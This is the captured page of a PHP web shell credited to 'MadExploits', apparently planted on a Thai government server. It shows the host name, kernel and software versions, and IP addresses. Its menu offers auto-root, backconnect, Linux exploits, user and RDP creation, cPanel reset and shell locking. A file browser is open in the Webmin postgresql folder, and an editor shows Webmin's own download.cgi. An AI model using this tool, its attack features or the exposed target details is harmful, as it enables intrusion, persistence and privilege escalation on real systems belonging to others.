Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
postgresql /
old /
[ HOME SHELL ]
Name
Size
Permission
Action
download.cgi
851
B
-rwxr-xr-x
search_form.cgi
1.31
KB
-rwxr-xr-x
view_table.cgi
12.74
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : download.cgi
#!/usr/bin/perl # download.cgi # Output the contents of a blob field require './postgresql-lib.pl'; &ReadParse(); &can_edit_db($in{'db'}) || &error($text{'dbase_ecannot'}); @str = &table_structure($in{'db'}, $in{'table'}); # Get the field to download $d = &execute_sql($in{'db'}, "select \"$in{'field'}\" from \"$in{'table'}\" where oid = ?", $in{'row'}); # Work out the MIME type based on the data $data = $d->{'data'}->[0]->[0]; if ($data =~ /^\s*(<!doctype|<html|<head|<title)/i) { $type = "text/html"; } elsif ($data =~ /^GIF89/) { $type = "image/gif"; } elsif ($data =~ /^\377\330\377\340/) { $type = "image/jpeg"; } elsif ($data =~ /^%PDF/) { $type = "application/pdf"; } elsif ($data =~ /^[\040-\176\r\n\t]+$/) { $type = "text/plain"; } else { $type = "application/octet-stream"; } print "Content-type: $type\n\n"; print $data;
Close